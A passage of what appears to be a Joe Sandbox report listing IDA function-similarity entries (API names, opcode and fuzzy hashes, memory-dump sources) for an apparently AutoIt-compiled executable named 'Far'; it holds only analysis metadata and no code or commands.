                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: IconNotifyShell_
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1144537725-0
                                                                                                                                                                      • Opcode ID: 7bea4270f957565a9ad37107269845c54d1d2a8ecbba6d94dcffb9444ca25ae7
                                                                                                                                                                      • Instruction ID: 530b6ea8e42a16f02fcdde7fd0b001c0e7cdd68207ada5fb61193722db89ec76
                                                                                                                                                                      • Opcode Fuzzy Hash: 7bea4270f957565a9ad37107269845c54d1d2a8ecbba6d94dcffb9444ca25ae7
                                                                                                                                                                      • Instruction Fuzzy Hash: EFF09021A0DB8A9BE3A5AB98A00036976A5F744704F840034D18C02641DF7DC3088B50
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Open_onexit
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3030063568-0
                                                                                                                                                                      • Opcode ID: b12d59ccc9ba3de22b7e4879e144cae7e70e5f1dd0983fb156c49f2ebe46ff73
                                                                                                                                                                      • Instruction ID: d211c7ed4ca6b4393b84cd70039410fc0c225f593b8724368a5fa6126683d1dd
                                                                                                                                                                      • Opcode Fuzzy Hash: b12d59ccc9ba3de22b7e4879e144cae7e70e5f1dd0983fb156c49f2ebe46ff73
                                                                                                                                                                      • Instruction Fuzzy Hash: FFE08C50F0E54FA2EA04B7E5E88D0749261EF94B8AFC14132C10D47366FF5CD1AAA720
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • FindCloseChangeNotification.KERNELBASE(?,?,00000001,00007FF73D0459D7,?,?,?,00007FF73D04C453), ref: 00007FF73D0459A5
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ChangeCloseFindNotification
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2591292051-0
                                                                                                                                                                      • Opcode ID: 923db915552005a13eca234126b5c06333ce33e473e1ad73eb68adafc71e0948
                                                                                                                                                                      • Instruction ID: 50ca466e84cb683773e449ae27878d40ff77427a76b16d32cbfd688d9d8d56d3
                                                                                                                                                                      • Opcode Fuzzy Hash: 923db915552005a13eca234126b5c06333ce33e473e1ad73eb68adafc71e0948
                                                                                                                                                                      • Instruction Fuzzy Hash: 53E04FA3E18A0996FB045BA0D44833C6370E728F3EF501720C63C041C5EFBCC5948650
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _onexit
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 572287377-0
                                                                                                                                                                      • Opcode ID: f7a7f9bab9f42132d0b285807a4bb012c8a67892999842f1185965a2b71c44e0
                                                                                                                                                                      • Instruction ID: 95fbe130c620000b497db18d3d33201cfc96cd48fe2b58a67fba6781fcc98bc1
                                                                                                                                                                      • Opcode Fuzzy Hash: f7a7f9bab9f42132d0b285807a4bb012c8a67892999842f1185965a2b71c44e0
                                                                                                                                                                      • Instruction Fuzzy Hash: 18C01200F6D54FA1E50473F95C9A0B44060DF68B15FD00572D14DC4293FF0C51EBAA31
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _onexit
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 572287377-0
                                                                                                                                                                      • Opcode ID: d64bee4aeed0cd9d858d4d7276f25433730869fe4a4aa376e43a8662143b1d09
                                                                                                                                                                      • Instruction ID: f245e4662f3c265fb20c7ad299ecaf38987a6c765025527b4d0573dc32bc0a15
                                                                                                                                                                      • Opcode Fuzzy Hash: d64bee4aeed0cd9d858d4d7276f25433730869fe4a4aa376e43a8662143b1d09
                                                                                                                                                                      • Instruction Fuzzy Hash: 39C01200F5D44FA1E50473F5888B0B44050CF68B05FE00172D14D883D3FF0C91EA6A21
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Process$CurrentVersionWow64_onexit
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2932345936-0
                                                                                                                                                                      • Opcode ID: 23839b1ed6039edf784697293449aa4853d529117b93e47d32a08b70584eea6f
                                                                                                                                                                      • Instruction ID: 880c28af5fc4217b015f8d116b9805cab5e67d051ac527c244858682bffc585d
                                                                                                                                                                      • Opcode Fuzzy Hash: 23839b1ed6039edf784697293449aa4853d529117b93e47d32a08b70584eea6f
                                                                                                                                                                      • Instruction Fuzzy Hash: A1C01210F5D44FA1E50473F5988A0B44050CFA8B05FD00171D24D882D3FF0C51EA6721
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: DestroyIcon
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1234817797-0
                                                                                                                                                                      • Opcode ID: 0d89603e996b7ea6abf3d6dc9dca7bdcdd40fded03c9c63833a6848e43c83302
                                                                                                                                                                      • Instruction ID: 61597b77c8037f177f9a3f911f0f31f00e5e3d72e6bb60161437b93d32a02a78
                                                                                                                                                                      • Opcode Fuzzy Hash: 0d89603e996b7ea6abf3d6dc9dca7bdcdd40fded03c9c63833a6848e43c83302
                                                                                                                                                                      • Instruction Fuzzy Hash: 3CE0B6A1E1E91BF1EB84F7D0E8954B49360AF94B04FC10831C50E461A6BF9DA18AA770
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                                      • Opcode ID: 7c33f8859c2b57bf045eb7a69f405e87aa34de0117918a63adbdec273ee7b030
                                                                                                                                                                      • Instruction ID: add83700e461cdfbceef76866d348b3f3e0a86277364b26bfa9589409003060c
                                                                                                                                                                      • Opcode Fuzzy Hash: 7c33f8859c2b57bf045eb7a69f405e87aa34de0117918a63adbdec273ee7b030
                                                                                                                                                                      • Instruction Fuzzy Hash: 8AC01220C0E40FA0E95837A809862B8C3515F03B20FE00232D03F422E0EB5CE46B3630
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: InfoParametersSystem
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3098949447-0
                                                                                                                                                                      • Opcode ID: a5a41a46eb0dea186bdd3579dadba9409b2a8f6fdade110388820c24077a0610
                                                                                                                                                                      • Instruction ID: f72e18a5952ce483f5959b8eee97a189e7662066020d1ecc1cc9f3c828cbf743
                                                                                                                                                                      • Opcode Fuzzy Hash: a5a41a46eb0dea186bdd3579dadba9409b2a8f6fdade110388820c24077a0610
                                                                                                                                                                      • Instruction Fuzzy Hash: 12C01271F0C4069FF328D756F841464F761EF58750BC54030C50942660DF2E79E4DB14
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: wcscpy
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1284135714-0
                                                                                                                                                                      • Opcode ID: cf7fa37a2d9fddca8071a5c30e12ba09ac34ac3b5b3218e726dd3834399541a6
                                                                                                                                                                      • Instruction ID: abb4a342ae78ff9921da8d0958337a76bc3f6f3814309deae575e86d94311c45
                                                                                                                                                                      • Opcode Fuzzy Hash: cf7fa37a2d9fddca8071a5c30e12ba09ac34ac3b5b3218e726dd3834399541a6
                                                                                                                                                                      • Instruction Fuzzy Hash: DBA17F37A1CA8AA1DA65EF65D16807DA360FB44FC4B884636DB8E47795EF3CE440D320
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: wcscpy
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1284135714-0
                                                                                                                                                                      • Opcode ID: d7a99286d2ed868ee1b544396779f67f90ae9b6e2a085d87e874ed833f995128
                                                                                                                                                                      • Instruction ID: c6f09d97c5432d79aa6eb219236909f4aedd0a6c2587a89a41eebc31005e341a
                                                                                                                                                                      • Opcode Fuzzy Hash: d7a99286d2ed868ee1b544396779f67f90ae9b6e2a085d87e874ed833f995128
                                                                                                                                                                      • Instruction Fuzzy Hash: 6911E362A0CA96A1DA04EF96D1442BDB330EF84FD0F888535DB6D07BD6DF28D461D750
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2191629493-0
                                                                                                                                                                      • Opcode ID: f1d320824f6adf03c7725a30a158d35ccc1c78f3904e994acbd5c110909edece
                                                                                                                                                                      • Instruction ID: f0549da82d11d44c9783b73a245a97883cb10b23f3764d577be3e7f01324b335
                                                                                                                                                                      • Opcode Fuzzy Hash: f1d320824f6adf03c7725a30a158d35ccc1c78f3904e994acbd5c110909edece
                                                                                                                                                                      • Instruction Fuzzy Hash: 88F0AF22B0C69592EB10AF66E59427DA760EF88FC4F888430EF5E47716DF38D4528B50
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: wcscpy
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1284135714-0
                                                                                                                                                                      • Opcode ID: d1a843a1ca542ee9378ecc93ed041f6bc6060f7f2d7e70a2f24c22d2c10b4619
                                                                                                                                                                      • Instruction ID: 222e324e4b5b65d331474d81d2cf2f666099bc833faff5b0c2fdc5135768d182
                                                                                                                                                                      • Opcode Fuzzy Hash: d1a843a1ca542ee9378ecc93ed041f6bc6060f7f2d7e70a2f24c22d2c10b4619
                                                                                                                                                                      • Instruction Fuzzy Hash: 8DE08661B0D64651ED04B7D6B949078E251DB89FF0F848334BE7C4B7D6EE2CD0404304
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Destroy$ImageList_Window$DeleteMessageObjectSend$IconMove
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3372153169-0
                                                                                                                                                                      • Opcode ID: 6efd0f35805d98d56fcfa6e1226efd81c10f6d97090dd359ae1d6e3ae03cd512
                                                                                                                                                                      • Instruction ID: 94001ae673a8596e16de1134458d7607e38dac16de35c28db1abc3fe20a6899f
                                                                                                                                                                      • Opcode Fuzzy Hash: 6efd0f35805d98d56fcfa6e1226efd81c10f6d97090dd359ae1d6e3ae03cd512
                                                                                                                                                                      • Instruction Fuzzy Hash: FA22C062A0D54BA1EB64ABA5D4542BDA362FF40F94F945132CE2E07690FF3DE590E330
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Process$StationWindow$CloseCurrentHandleUser$CreateDuplicate$BlockDesktopEnvironmentHeapOpenProfileToken$AdjustAllocDestroyErrorLastLoadLogonLookupPrivilegePrivilegesThreadUnloadValuewcscpy
                                                                                                                                                                      • String ID: default$winsta0$winsta0\default
                                                                                                                                                                      • API String ID: 3202303201-1423368268
                                                                                                                                                                      • Opcode ID: 513a4833af98609aad93fe044ca45d7eca6d44883eb324fa1777917f56f64ec4
                                                                                                                                                                      • Instruction ID: 2279898246df0f646d3474ee935a89df31eaf7e210300ef1ff1d805de2ec2e48
                                                                                                                                                                      • Opcode Fuzzy Hash: 513a4833af98609aad93fe044ca45d7eca6d44883eb324fa1777917f56f64ec4
                                                                                                                                                                      • Instruction Fuzzy Hash: 82A15F32A0CB4696EB10EFA1E4442AEB3A5FB85B94F840135DE5D47B98EF3CE005D760
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                                                                      • String ID: AutoIt v3 GUI
                                                                                                                                                                      • API String ID: 1458621304-248962490
                                                                                                                                                                      • Opcode ID: 2abb84ec35c37957b176f032e1c43793793925a8d798b8ae27241f7f01f2cae5
                                                                                                                                                                      • Instruction ID: 22bd669306ad215d65a34f361240a60aed7177102c2bc50df25194d6d8a87754
                                                                                                                                                                      • Opcode Fuzzy Hash: 2abb84ec35c37957b176f032e1c43793793925a8d798b8ae27241f7f01f2cae5
                                                                                                                                                                      • Instruction Fuzzy Hash: D5D17032A0864A9AEB54EFB9E8446AC77B1FB44B58F904135DA0E53B94EF3CE444DB10
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
